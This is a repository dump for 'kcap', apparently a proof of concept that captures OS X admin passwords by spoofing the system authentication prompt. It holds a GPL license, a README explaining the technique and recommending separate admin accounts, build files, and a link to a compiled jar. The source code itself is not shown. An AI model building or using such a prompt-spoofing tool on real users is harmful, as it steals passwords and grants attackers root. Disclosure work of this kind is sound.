├── .gitignore
├── LICENSE
├── README.md
└── kcap
├── build.xml
├── dist
├── README.TXT
└── kcap.jar
├── manifest.mf
├── nbproject
├── build-impl.xml
├── genfiles.properties
├── project.properties
└── project.xml
└── src
└── kcap
├── Kcap.java
└── Keyboard.java
/.gitignore:
--------------------------------------------------------------------------------
1 | *.class
2 |
3 | # Mobile Tools for Java (J2ME)
4 | .mtj.tmp/
5 | private/
6 |
7 | # Package Files #
8 | #*.jar
9 | *.war
10 | *.ear
11 |
12 | # virtual machine crash logs, see http://www.java.com/en/download/help/error_hotspot.xml
13 | hs_err_pid*
14 |
--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
1 | GNU GENERAL PUBLIC LICENSE
2 | Version 3, 29 June 2007
3 |
4 | Copyright (C) 2007 Free Software Foundation, Inc.
5 | Everyone is permitted to copy and distribute verbatim copies
6 | of this license document, but changing it is not allowed.
7 |
8 | Preamble
9 |
10 | The GNU General Public License is a free, copyleft license for
11 | software and other kinds of works.
12 |
13 | The licenses for most software and other practical works are designed
14 | to take away your freedom to share and change the works. By contrast,
15 | the GNU General Public License is intended to guarantee your freedom to
16 | share and change all versions of a program--to make sure it remains free
17 | software for all its users. We, the Free Software Foundation, use the
18 | GNU General Public License for most of our software; it applies also to
19 | any other work released this way by its authors. You can apply it to
20 | your programs, too.
21 |
22 | When we speak of free software, we are referring to freedom, not
23 | price. Our General Public Licenses are designed to make sure that you
24 | have the freedom to distribute copies of free software (and charge for
25 | them if you wish), that you receive source code or can get it if you
26 | want it, that you can change the software or use pieces of it in new
27 | free programs, and that you know you can do these things.
28 |
29 | To protect your rights, we need to prevent others from denying you
30 | these rights or asking you to surrender the rights. Therefore, you have
31 | certain responsibilities if you distribute copies of the software, or if
32 | you modify it: responsibilities to respect the freedom of others.
33 |
34 | For example, if you distribute copies of such a program, whether
35 | gratis or for a fee, you must pass on to the recipients the same
36 | freedoms that you received. You must make sure that they, too, receive
37 | or can get the source code. And you must show them these terms so they
38 | know their rights.
39 |
40 | Developers that use the GNU GPL protect your rights with two steps:
41 | (1) assert copyright on the software, and (2) offer you this License
42 | giving you legal permission to copy, distribute and/or modify it.
43 |
44 | For the developers' and authors' protection, the GPL clearly explains
45 | that there is no warranty for this free software. For both users' and
46 | authors' sake, the GPL requires that modified versions be marked as
47 | changed, so that their problems will not be attributed erroneously to
48 | authors of previous versions.
49 |
50 | Some devices are designed to deny users access to install or run
51 | modified versions of the software inside them, although the manufacturer
52 | can do so. This is fundamentally incompatible with the aim of
53 | protecting users' freedom to change the software. The systematic
54 | pattern of such abuse occurs in the area of products for individuals to
55 | use, which is precisely where it is most unacceptable. Therefore, we
56 | have designed this version of the GPL to prohibit the practice for those
57 | products. If such problems arise substantially in other domains, we
58 | stand ready to extend this provision to those domains in future versions
59 | of the GPL, as needed to protect the freedom of users.
60 |
61 | Finally, every program is threatened constantly by software patents.
62 | States should not allow patents to restrict development and use of
63 | software on general-purpose computers, but in those that do, we wish to
64 | avoid the special danger that patents applied to a free program could
65 | make it effectively proprietary. To prevent this, the GPL assures that
66 | patents cannot be used to render the program non-free.
67 |
68 | The precise terms and conditions for copying, distribution and
69 | modification follow.
70 |
71 | TERMS AND CONDITIONS
72 |
73 | 0. Definitions.
74 |
75 | "This License" refers to version 3 of the GNU General Public License.
76 |
77 | "Copyright" also means copyright-like laws that apply to other kinds of
78 | works, such as semiconductor masks.
79 |
80 | "The Program" refers to any copyrightable work licensed under this
81 | License. Each licensee is addressed as "you". "Licensees" and
82 | "recipients" may be individuals or organizations.
83 |
84 | To "modify" a work means to copy from or adapt all or part of the work
85 | in a fashion requiring copyright permission, other than the making of an
86 | exact copy. The resulting work is called a "modified version" of the
87 | earlier work or a work "based on" the earlier work.
88 |
89 | A "covered work" means either the unmodified Program or a work based
90 | on the Program.
91 |
92 | To "propagate" a work means to do anything with it that, without
93 | permission, would make you directly or secondarily liable for
94 | infringement under applicable copyright law, except executing it on a
95 | computer or modifying a private copy. Propagation includes copying,
96 | distribution (with or without modification), making available to the
97 | public, and in some countries other activities as well.
98 |
99 | To "convey" a work means any kind of propagation that enables other
100 | parties to make or receive copies. Mere interaction with a user through
101 | a computer network, with no transfer of a copy, is not conveying.
102 |
103 | An interactive user interface displays "Appropriate Legal Notices"
104 | to the extent that it includes a convenient and prominently visible
105 | feature that (1) displays an appropriate copyright notice, and (2)
106 | tells the user that there is no warranty for the work (except to the
107 | extent that warranties are provided), that licensees may convey the
108 | work under this License, and how to view a copy of this License. If
109 | the interface presents a list of user commands or options, such as a
110 | menu, a prominent item in the list meets this criterion.
111 |
112 | 1. Source Code.
113 |
114 | The "source code" for a work means the preferred form of the work
115 | for making modifications to it. "Object code" means any non-source
116 | form of a work.
117 |
118 | A "Standard Interface" means an interface that either is an official
119 | standard defined by a recognized standards body, or, in the case of
120 | interfaces specified for a particular programming language, one that
121 | is widely used among developers working in that language.
122 |
123 | The "System Libraries" of an executable work include anything, other
124 | than the work as a whole, that (a) is included in the normal form of
125 | packaging a Major Component, but which is not part of that Major
126 | Component, and (b) serves only to enable use of the work with that
127 | Major Component, or to implement a Standard Interface for which an
128 | implementation is available to the public in source code form. A
129 | "Major Component", in this context, means a major essential component
130 | (kernel, window system, and so on) of the specific operating system
131 | (if any) on which the executable work runs, or a compiler used to
132 | produce the work, or an object code interpreter used to run it.
133 |
134 | The "Corresponding Source" for a work in object code form means all
135 | the source code needed to generate, install, and (for an executable
136 | work) run the object code and to modify the work, including scripts to
137 | control those activities. However, it does not include the work's
138 | System Libraries, or general-purpose tools or generally available free
139 | programs which are used unmodified in performing those activities but
140 | which are not part of the work. For example, Corresponding Source
141 | includes interface definition files associated with source files for
142 | the work, and the source code for shared libraries and dynamically
143 | linked subprograms that the work is specifically designed to require,
144 | such as by intimate data communication or control flow between those
145 | subprograms and other parts of the work.
146 |
147 | The Corresponding Source need not include anything that users
148 | can regenerate automatically from other parts of the Corresponding
149 | Source.
150 |
151 | The Corresponding Source for a work in source code form is that
152 | same work.
153 |
154 | 2. Basic Permissions.
155 |
156 | All rights granted under this License are granted for the term of
157 | copyright on the Program, and are irrevocable provided the stated
158 | conditions are met. This License explicitly affirms your unlimited
159 | permission to run the unmodified Program. The output from running a
160 | covered work is covered by this License only if the output, given its
161 | content, constitutes a covered work. This License acknowledges your
162 | rights of fair use or other equivalent, as provided by copyright law.
163 |
164 | You may make, run and propagate covered works that you do not
165 | convey, without conditions so long as your license otherwise remains
166 | in force. You may convey covered works to others for the sole purpose
167 | of having them make modifications exclusively for you, or provide you
168 | with facilities for running those works, provided that you comply with
169 | the terms of this License in conveying all material for which you do
170 | not control copyright. Those thus making or running the covered works
171 | for you must do so exclusively on your behalf, under your direction
172 | and control, on terms that prohibit them from making any copies of
173 | your copyrighted material outside their relationship with you.
174 |
175 | Conveying under any other circumstances is permitted solely under
176 | the conditions stated below. Sublicensing is not allowed; section 10
177 | makes it unnecessary.
178 |
179 | 3. Protecting Users' Legal Rights From Anti-Circumvention Law.
180 |
181 | No covered work shall be deemed part of an effective technological
182 | measure under any applicable law fulfilling obligations under article
183 | 11 of the WIPO copyright treaty adopted on 20 December 1996, or
184 | similar laws prohibiting or restricting circumvention of such
185 | measures.
186 |
187 | When you convey a covered work, you waive any legal power to forbid
188 | circumvention of technological measures to the extent such circumvention
189 | is effected by exercising rights under this License with respect to
190 | the covered work, and you disclaim any intention to limit operation or
191 | modification of the work as a means of enforcing, against the work's
192 | users, your or third parties' legal rights to forbid circumvention of
193 | technological measures.
194 |
195 | 4. Conveying Verbatim Copies.
196 |
197 | You may convey verbatim copies of the Program's source code as you
198 | receive it, in any medium, provided that you conspicuously and
199 | appropriately publish on each copy an appropriate copyright notice;
200 | keep intact all notices stating that this License and any
201 | non-permissive terms added in accord with section 7 apply to the code;
202 | keep intact all notices of the absence of any warranty; and give all
203 | recipients a copy of this License along with the Program.
204 |
205 | You may charge any price or no price for each copy that you convey,
206 | and you may offer support or warranty protection for a fee.
207 |
208 | 5. Conveying Modified Source Versions.
209 |
210 | You may convey a work based on the Program, or the modifications to
211 | produce it from the Program, in the form of source code under the
212 | terms of section 4, provided that you also meet all of these conditions:
213 |
214 | a) The work must carry prominent notices stating that you modified
215 | it, and giving a relevant date.
216 |
217 | b) The work must carry prominent notices stating that it is
218 | released under this License and any conditions added under section
219 | 7. This requirement modifies the requirement in section 4 to
220 | "keep intact all notices".
221 |
222 | c) You must license the entire work, as a whole, under this
223 | License to anyone who comes into possession of a copy. This
224 | License will therefore apply, along with any applicable section 7
225 | additional terms, to the whole of the work, and all its parts,
226 | regardless of how they are packaged. This License gives no
227 | permission to license the work in any other way, but it does not
228 | invalidate such permission if you have separately received it.
229 |
230 | d) If the work has interactive user interfaces, each must display
231 | Appropriate Legal Notices; however, if the Program has interactive
232 | interfaces that do not display Appropriate Legal Notices, your
233 | work need not make them do so.
234 |
235 | A compilation of a covered work with other separate and independent
236 | works, which are not by their nature extensions of the covered work,
237 | and which are not combined with it such as to form a larger program,
238 | in or on a volume of a storage or distribution medium, is called an
239 | "aggregate" if the compilation and its resulting copyright are not
240 | used to limit the access or legal rights of the compilation's users
241 | beyond what the individual works permit. Inclusion of a covered work
242 | in an aggregate does not cause this License to apply to the other
243 | parts of the aggregate.
244 |
245 | 6. Conveying Non-Source Forms.
246 |
247 | You may convey a covered work in object code form under the terms
248 | of sections 4 and 5, provided that you also convey the
249 | machine-readable Corresponding Source under the terms of this License,
250 | in one of these ways:
251 |
252 | a) Convey the object code in, or embodied in, a physical product
253 | (including a physical distribution medium), accompanied by the
254 | Corresponding Source fixed on a durable physical medium
255 | customarily used for software interchange.
256 |
257 | b) Convey the object code in, or embodied in, a physical product
258 | (including a physical distribution medium), accompanied by a
259 | written offer, valid for at least three years and valid for as
260 | long as you offer spare parts or customer support for that product
261 | model, to give anyone who possesses the object code either (1) a
262 | copy of the Corresponding Source for all the software in the
263 | product that is covered by this License, on a durable physical
264 | medium customarily used for software interchange, for a price no
265 | more than your reasonable cost of physically performing this
266 | conveying of source, or (2) access to copy the
267 | Corresponding Source from a network server at no charge.
268 |
269 | c) Convey individual copies of the object code with a copy of the
270 | written offer to provide the Corresponding Source. This
271 | alternative is allowed only occasionally and noncommercially, and
272 | only if you received the object code with such an offer, in accord
273 | with subsection 6b.
274 |
275 | d) Convey the object code by offering access from a designated
276 | place (gratis or for a charge), and offer equivalent access to the
277 | Corresponding Source in the same way through the same place at no
278 | further charge. You need not require recipients to copy the
279 | Corresponding Source along with the object code. If the place to
280 | copy the object code is a network server, the Corresponding Source
281 | may be on a different server (operated by you or a third party)
282 | that supports equivalent copying facilities, provided you maintain
283 | clear directions next to the object code saying where to find the
284 | Corresponding Source. Regardless of what server hosts the
285 | Corresponding Source, you remain obligated to ensure that it is
286 | available for as long as needed to satisfy these requirements.
287 |
288 | e) Convey the object code using peer-to-peer transmission, provided
289 | you inform other peers where the object code and Corresponding
290 | Source of the work are being offered to the general public at no
291 | charge under subsection 6d.
292 |
293 | A separable portion of the object code, whose source code is excluded
294 | from the Corresponding Source as a System Library, need not be
295 | included in conveying the object code work.
296 |
297 | A "User Product" is either (1) a "consumer product", which means any
298 | tangible personal property which is normally used for personal, family,
299 | or household purposes, or (2) anything designed or sold for incorporation
300 | into a dwelling. In determining whether a product is a consumer product,
301 | doubtful cases shall be resolved in favor of coverage. For a particular
302 | product received by a particular user, "normally used" refers to a
303 | typical or common use of that class of product, regardless of the status
304 | of the particular user or of the way in which the particular user
305 | actually uses, or expects or is expected to use, the product. A product
306 | is a consumer product regardless of whether the product has substantial
307 | commercial, industrial or non-consumer uses, unless such uses represent
308 | the only significant mode of use of the product.
309 |
310 | "Installation Information" for a User Product means any methods,
311 | procedures, authorization keys, or other information required to install
312 | and execute modified versions of a covered work in that User Product from
313 | a modified version of its Corresponding Source. The information must
314 | suffice to ensure that the continued functioning of the modified object
315 | code is in no case prevented or interfered with solely because
316 | modification has been made.
317 |
318 | If you convey an object code work under this section in, or with, or
319 | specifically for use in, a User Product, and the conveying occurs as
320 | part of a transaction in which the right of possession and use of the
321 | User Product is transferred to the recipient in perpetuity or for a
322 | fixed term (regardless of how the transaction is characterized), the
323 | Corresponding Source conveyed under this section must be accompanied
324 | by the Installation Information. But this requirement does not apply
325 | if neither you nor any third party retains the ability to install
326 | modified object code on the User Product (for example, the work has
327 | been installed in ROM).
328 |
329 | The requirement to provide Installation Information does not include a
330 | requirement to continue to provide support service, warranty, or updates
331 | for a work that has been modified or installed by the recipient, or for
332 | the User Product in which it has been modified or installed. Access to a
333 | network may be denied when the modification itself materially and
334 | adversely affects the operation of the network or violates the rules and
335 | protocols for communication across the network.
336 |
337 | Corresponding Source conveyed, and Installation Information provided,
338 | in accord with this section must be in a format that is publicly
339 | documented (and with an implementation available to the public in
340 | source code form), and must require no special password or key for
341 | unpacking, reading or copying.
342 |
343 | 7. Additional Terms.
344 |
345 | "Additional permissions" are terms that supplement the terms of this
346 | License by making exceptions from one or more of its conditions.
347 | Additional permissions that are applicable to the entire Program shall
348 | be treated as though they were included in this License, to the extent
349 | that they are valid under applicable law. If additional permissions
350 | apply only to part of the Program, that part may be used separately
351 | under those permissions, but the entire Program remains governed by
352 | this License without regard to the additional permissions.
353 |
354 | When you convey a copy of a covered work, you may at your option
355 | remove any additional permissions from that copy, or from any part of
356 | it. (Additional permissions may be written to require their own
357 | removal in certain cases when you modify the work.) You may place
358 | additional permissions on material, added by you to a covered work,
359 | for which you have or can give appropriate copyright permission.
360 |
361 | Notwithstanding any other provision of this License, for material you
362 | add to a covered work, you may (if authorized by the copyright holders of
363 | that material) supplement the terms of this License with terms:
364 |
365 | a) Disclaiming warranty or limiting liability differently from the
366 | terms of sections 15 and 16 of this License; or
367 |
368 | b) Requiring preservation of specified reasonable legal notices or
369 | author attributions in that material or in the Appropriate Legal
370 | Notices displayed by works containing it; or
371 |
372 | c) Prohibiting misrepresentation of the origin of that material, or
373 | requiring that modified versions of such material be marked in
374 | reasonable ways as different from the original version; or
375 |
376 | d) Limiting the use for publicity purposes of names of licensors or
377 | authors of the material; or
378 |
379 | e) Declining to grant rights under trademark law for use of some
380 | trade names, trademarks, or service marks; or
381 |
382 | f) Requiring indemnification of licensors and authors of that
383 | material by anyone who conveys the material (or modified versions of
384 | it) with contractual assumptions of liability to the recipient, for
385 | any liability that these contractual assumptions directly impose on
386 | those licensors and authors.
387 |
388 | All other non-permissive additional terms are considered "further
389 | restrictions" within the meaning of section 10. If the Program as you
390 | received it, or any part of it, contains a notice stating that it is
391 | governed by this License along with a term that is a further
392 | restriction, you may remove that term. If a license document contains
393 | a further restriction but permits relicensing or conveying under this
394 | License, you may add to a covered work material governed by the terms
395 | of that license document, provided that the further restriction does
396 | not survive such relicensing or conveying.
397 |
398 | If you add terms to a covered work in accord with this section, you
399 | must place, in the relevant source files, a statement of the
400 | additional terms that apply to those files, or a notice indicating
401 | where to find the applicable terms.
402 |
403 | Additional terms, permissive or non-permissive, may be stated in the
404 | form of a separately written license, or stated as exceptions;
405 | the above requirements apply either way.
406 |
407 | 8. Termination.
408 |
409 | You may not propagate or modify a covered work except as expressly
410 | provided under this License. Any attempt otherwise to propagate or
411 | modify it is void, and will automatically terminate your rights under
412 | this License (including any patent licenses granted under the third
413 | paragraph of section 11).
414 |
415 | However, if you cease all violation of this License, then your
416 | license from a particular copyright holder is reinstated (a)
417 | provisionally, unless and until the copyright holder explicitly and
418 | finally terminates your license, and (b) permanently, if the copyright
419 | holder fails to notify you of the violation by some reasonable means
420 | prior to 60 days after the cessation.
421 |
422 | Moreover, your license from a particular copyright holder is
423 | reinstated permanently if the copyright holder notifies you of the
424 | violation by some reasonable means, this is the first time you have
425 | received notice of violation of this License (for any work) from that
426 | copyright holder, and you cure the violation prior to 30 days after
427 | your receipt of the notice.
428 |
429 | Termination of your rights under this section does not terminate the
430 | licenses of parties who have received copies or rights from you under
431 | this License. If your rights have been terminated and not permanently
432 | reinstated, you do not qualify to receive new licenses for the same
433 | material under section 10.
434 |
435 | 9. Acceptance Not Required for Having Copies.
436 |
437 | You are not required to accept this License in order to receive or
438 | run a copy of the Program. Ancillary propagation of a covered work
439 | occurring solely as a consequence of using peer-to-peer transmission
440 | to receive a copy likewise does not require acceptance. However,
441 | nothing other than this License grants you permission to propagate or
442 | modify any covered work. These actions infringe copyright if you do
443 | not accept this License. Therefore, by modifying or propagating a
444 | covered work, you indicate your acceptance of this License to do so.
445 |
446 | 10. Automatic Licensing of Downstream Recipients.
447 |
448 | Each time you convey a covered work, the recipient automatically
449 | receives a license from the original licensors, to run, modify and
450 | propagate that work, subject to this License. You are not responsible
451 | for enforcing compliance by third parties with this License.
452 |
453 | An "entity transaction" is a transaction transferring control of an
454 | organization, or substantially all assets of one, or subdividing an
455 | organization, or merging organizations. If propagation of a covered
456 | work results from an entity transaction, each party to that
457 | transaction who receives a copy of the work also receives whatever
458 | licenses to the work the party's predecessor in interest had or could
459 | give under the previous paragraph, plus a right to possession of the
460 | Corresponding Source of the work from the predecessor in interest, if
461 | the predecessor has it or can get it with reasonable efforts.
462 |
463 | You may not impose any further restrictions on the exercise of the
464 | rights granted or affirmed under this License. For example, you may
465 | not impose a license fee, royalty, or other charge for exercise of
466 | rights granted under this License, and you may not initiate litigation
467 | (including a cross-claim or counterclaim in a lawsuit) alleging that
468 | any patent claim is infringed by making, using, selling, offering for
469 | sale, or importing the Program or any portion of it.
470 |
471 | 11. Patents.
472 |
473 | A "contributor" is a copyright holder who authorizes use under this
474 | License of the Program or a work on which the Program is based. The
475 | work thus licensed is called the contributor's "contributor version".
476 |
477 | A contributor's "essential patent claims" are all patent claims
478 | owned or controlled by the contributor, whether already acquired or
479 | hereafter acquired, that would be infringed by some manner, permitted
480 | by this License, of making, using, or selling its contributor version,
481 | but do not include claims that would be infringed only as a
482 | consequence of further modification of the contributor version. For
483 | purposes of this definition, "control" includes the right to grant
484 | patent sublicenses in a manner consistent with the requirements of
485 | this License.
486 |
487 | Each contributor grants you a non-exclusive, worldwide, royalty-free
488 | patent license under the contributor's essential patent claims, to
489 | make, use, sell, offer for sale, import and otherwise run, modify and
490 | propagate the contents of its contributor version.
491 |
492 | In the following three paragraphs, a "patent license" is any express
493 | agreement or commitment, however denominated, not to enforce a patent
494 | (such as an express permission to practice a patent or covenant not to
495 | sue for patent infringement). To "grant" such a patent license to a
496 | party means to make such an agreement or commitment not to enforce a
497 | patent against the party.
498 |
499 | If you convey a covered work, knowingly relying on a patent license,
500 | and the Corresponding Source of the work is not available for anyone
501 | to copy, free of charge and under the terms of this License, through a
502 | publicly available network server or other readily accessible means,
503 | then you must either (1) cause the Corresponding Source to be so
504 | available, or (2) arrange to deprive yourself of the benefit of the
505 | patent license for this particular work, or (3) arrange, in a manner
506 | consistent with the requirements of this License, to extend the patent
507 | license to downstream recipients. "Knowingly relying" means you have
508 | actual knowledge that, but for the patent license, your conveying the
509 | covered work in a country, or your recipient's use of the covered work
510 | in a country, would infringe one or more identifiable patents in that
511 | country that you have reason to believe are valid.
512 |
513 | If, pursuant to or in connection with a single transaction or
514 | arrangement, you convey, or propagate by procuring conveyance of, a
515 | covered work, and grant a patent license to some of the parties
516 | receiving the covered work authorizing them to use, propagate, modify
517 | or convey a specific copy of the covered work, then the patent license
518 | you grant is automatically extended to all recipients of the covered
519 | work and works based on it.
520 |
521 | A patent license is "discriminatory" if it does not include within
522 | the scope of its coverage, prohibits the exercise of, or is
523 | conditioned on the non-exercise of one or more of the rights that are
524 | specifically granted under this License. You may not convey a covered
525 | work if you are a party to an arrangement with a third party that is
526 | in the business of distributing software, under which you make payment
527 | to the third party based on the extent of your activity of conveying
528 | the work, and under which the third party grants, to any of the
529 | parties who would receive the covered work from you, a discriminatory
530 | patent license (a) in connection with copies of the covered work
531 | conveyed by you (or copies made from those copies), or (b) primarily
532 | for and in connection with specific products or compilations that
533 | contain the covered work, unless you entered into that arrangement,
534 | or that patent license was granted, prior to 28 March 2007.
535 |
536 | Nothing in this License shall be construed as excluding or limiting
537 | any implied license or other defenses to infringement that may
538 | otherwise be available to you under applicable patent law.
539 |
540 | 12. No Surrender of Others' Freedom.
541 |
542 | If conditions are imposed on you (whether by court order, agreement or
543 | otherwise) that contradict the conditions of this License, they do not
544 | excuse you from the conditions of this License. If you cannot convey a
545 | covered work so as to satisfy simultaneously your obligations under this
546 | License and any other pertinent obligations, then as a consequence you may
547 | not convey it at all. For example, if you agree to terms that obligate you
548 | to collect a royalty for further conveying from those to whom you convey
549 | the Program, the only way you could satisfy both those terms and this
550 | License would be to refrain entirely from conveying the Program.
551 |
552 | 13. Use with the GNU Affero General Public License.
553 |
554 | Notwithstanding any other provision of this License, you have
555 | permission to link or combine any covered work with a work licensed
556 | under version 3 of the GNU Affero General Public License into a single
557 | combined work, and to convey the resulting work. The terms of this
558 | License will continue to apply to the part which is the covered work,
559 | but the special requirements of the GNU Affero General Public License,
560 | section 13, concerning interaction through a network will apply to the
561 | combination as such.
562 |
563 | 14. Revised Versions of this License.
564 |
565 | The Free Software Foundation may publish revised and/or new versions of
566 | the GNU General Public License from time to time. Such new versions will
567 | be similar in spirit to the present version, but may differ in detail to
568 | address new problems or concerns.
569 |
570 | Each version is given a distinguishing version number. If the
571 | Program specifies that a certain numbered version of the GNU General
572 | Public License "or any later version" applies to it, you have the
573 | option of following the terms and conditions either of that numbered
574 | version or of any later version published by the Free Software
575 | Foundation. If the Program does not specify a version number of the
576 | GNU General Public License, you may choose any version ever published
577 | by the Free Software Foundation.
578 |
579 | If the Program specifies that a proxy can decide which future
580 | versions of the GNU General Public License can be used, that proxy's
581 | public statement of acceptance of a version permanently authorizes you
582 | to choose that version for the Program.
583 |
584 | Later license versions may give you additional or different
585 | permissions. However, no additional obligations are imposed on any
586 | author or copyright holder as a result of your choosing to follow a
587 | later version.
588 |
589 | 15. Disclaimer of Warranty.
590 |
591 | THERE IS NO WARRANTY FOR THE PROGRAM, TO THE EXTENT PERMITTED BY
592 | APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT
593 | HOLDERS AND/OR OTHER PARTIES PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY
594 | OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO,
595 | THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
596 | PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM
597 | IS WITH YOU. SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF
598 | ALL NECESSARY SERVICING, REPAIR OR CORRECTION.
599 |
600 | 16. Limitation of Liability.
601 |
602 | IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
603 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MODIFIES AND/OR CONVEYS
604 | THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY
605 | GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE
606 | USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED TO LOSS OF
607 | DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD
608 | PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER PROGRAMS),
609 | EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF
610 | SUCH DAMAGES.
611 |
612 | 17. Interpretation of Sections 15 and 16.
613 |
614 | If the disclaimer of warranty and limitation of liability provided
615 | above cannot be given local legal effect according to their terms,
616 | reviewing courts shall apply local law that most closely approximates
617 | an absolute waiver of all civil liability in connection with the
618 | Program, unless a warranty or assumption of liability accompanies a
619 | copy of the Program in return for a fee.
620 |
621 | END OF TERMS AND CONDITIONS
622 |
623 | How to Apply These Terms to Your New Programs
624 |
625 | If you develop a new program, and you want it to be of the greatest
626 | possible use to the public, the best way to achieve this is to make it
627 | free software which everyone can redistribute and change under these terms.
628 |
629 | To do so, attach the following notices to the program. It is safest
630 | to attach them to the start of each source file to most effectively
631 | state the exclusion of warranty; and each file should have at least
632 | the "copyright" line and a pointer to where the full notice is found.
633 |
634 | {one line to give the program's name and a brief idea of what it does.}
635 | Copyright (C) {year} {name of author}
636 |
637 | This program is free software: you can redistribute it and/or modify
638 | it under the terms of the GNU General Public License as published by
639 | the Free Software Foundation, either version 3 of the License, or
640 | (at your option) any later version.
641 |
642 | This program is distributed in the hope that it will be useful,
643 | but WITHOUT ANY WARRANTY; without even the implied warranty of
644 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
645 | GNU General Public License for more details.
646 |
647 | You should have received a copy of the GNU General Public License
648 | along with this program. If not, see .
649 |
650 | Also add information on how to contact you by electronic and paper mail.
651 |
652 | If the program does terminal interaction, make it output a short
653 | notice like this when it starts in an interactive mode:
654 |
655 | {project} Copyright (C) {year} {fullname}
656 | This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
657 | This is free software, and you are welcome to redistribute it
658 | under certain conditions; type `show c' for details.
659 |
660 | The hypothetical commands `show w' and `show c' should show the appropriate
661 | parts of the General Public License. Of course, your program's commands
662 | might be different; for a GUI interface, you would use an "about box".
663 |
664 | You should also get your employer (if you work as a programmer) or school,
665 | if any, to sign a "copyright disclaimer" for the program, if necessary.
666 | For more information on this, and how to apply and follow the GNU GPL, see
667 | .
668 |
669 | The GNU General Public License does not permit incorporating your program
670 | into proprietary programs. If your program is a subroutine library, you
671 | may consider it more useful to permit linking proprietary applications with
672 | the library. If this is what you want to do, use the GNU Lesser General
673 | Public License instead of this License. But first, please read
674 | .
675 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # kcap
2 |
3 | Privilege escalation by design on OS X. By scriptjunkie https://www.scriptjunkie.us/
4 |
5 | Demonstration here: https://vimeo.com/183135795
6 |
7 | This program simply uses screen captures and programmatically generated key and mouse events to locally and
8 | graphically man-in-the-middle an OS X password prompt to escalate privileges.
9 |
10 | OS X makes this interception easy because, in contrast with Windows' UAC prompt,
11 | unprivileged processes are allowed to interact with and spoof input to the password request window.
12 |
13 | This program polls the screen to detect a system authentication prompt,
14 | closes it, replaces it with a cloned version, then when the user enters a password
15 | it saves the password, re-opens the original password prompt, moves it offscreen,
16 | types in the password to the original password prompt. Then it moves the orignal prompt back to its original position and hits enter.
17 |
18 | This may sound like a lot, but it only results in a brief flash in the UI that is hard to see.
19 |
20 | The peanut gallery might point out that there is an empty dock item that is created when you run this,
21 | and it's possible to see a few pixels in the corner briefly show up when you run the attack.
22 | This is only because I was lazy and have never programmed an OS X GUI program before, so I just spent a couple hours and did it in Java.
23 | If you write a native program you can make both of those go away.
24 |
25 | I tested it on a Macbook Air at the default resolution 1440x900 against most of the password prompts from the system preferences application.
26 | It probably will get the pixel calculations wrong on other systems so you'll need to test and possibly modify some of the
27 | offsets if you want to run it elsewhere.
28 |
29 | If Apple "fixes" this attack vector by denying unprivileged programs the right to interact with that window, it doesn't matter;
30 | unprivileged programs could simply modify the shortcut that starts the system settings application and have it start a cloned version
31 | instead that does the same thing except also recording your password.
32 |
33 | Common wisdom would have you believe when you run sudo that you are only granting root privileges to one command at one point in time.
34 | In reality, you are granting root privileges to any hacker who has ever run any code in any process at any previous time in your account
35 | and decided they wanted escalated privileges.
36 |
37 | Having users escalate privileges from an unprivileged desktop will never be a real or effective security barrier.
38 | Instead, use separate accounts for admin tasks and day-to-day tasks. Don't browse the internet or check email when
39 | logged in to your admin account and don't enter your admin password when logged into your day-to-day account.
40 |
--------------------------------------------------------------------------------
/kcap/build.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 | Builds, tests, and runs the project kcap.
12 |
13 |
73 |
74 |
--------------------------------------------------------------------------------
/kcap/dist/README.TXT:
--------------------------------------------------------------------------------
1 | ========================
2 | BUILD OUTPUT DESCRIPTION
3 | ========================
4 |
5 | When you build an Java application project that has a main class, the IDE
6 | automatically copies all of the JAR
7 | files on the projects classpath to your projects dist/lib folder. The IDE
8 | also adds each of the JAR files to the Class-Path element in the application
9 | JAR files manifest file (MANIFEST.MF).
10 |
11 | To run the project from the command line, go to the dist folder and
12 | type the following:
13 |
14 | java -jar "kcap.jar"
15 |
16 | To distribute this project, zip up the dist folder (including the lib folder)
17 | and distribute the ZIP file.
18 |
19 | Notes:
20 |
21 | * If two JAR files on the project classpath have the same name, only the first
22 | JAR file is copied to the lib folder.
23 | * Only JAR files are copied to the lib folder.
24 | If the classpath contains other types of files or folders, these files (folders)
25 | are not copied.
26 | * If a library on the projects classpath also has a Class-Path element
27 | specified in the manifest,the content of the Class-Path element has to be on
28 | the projects runtime path.
29 | * To set a main class in a standard Java project, right-click the project node
30 | in the Projects window and choose Properties. Then click Run and enter the
31 | class name in the Main Class field. Alternatively, you can manually type the
32 | class name in the manifest Main-Class element.
33 |
--------------------------------------------------------------------------------
/kcap/dist/kcap.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/scriptjunkie/kcap/f73ad6aa8b39ae441c3a354f7d6412562d74d52b/kcap/dist/kcap.jar
--------------------------------------------------------------------------------
/kcap/manifest.mf:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | X-COMMENT: Main-Class will be added automatically by build
3 |
4 |
--------------------------------------------------------------------------------
/kcap/nbproject/build-impl.xml:
--------------------------------------------------------------------------------
1 |
2 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
36 |
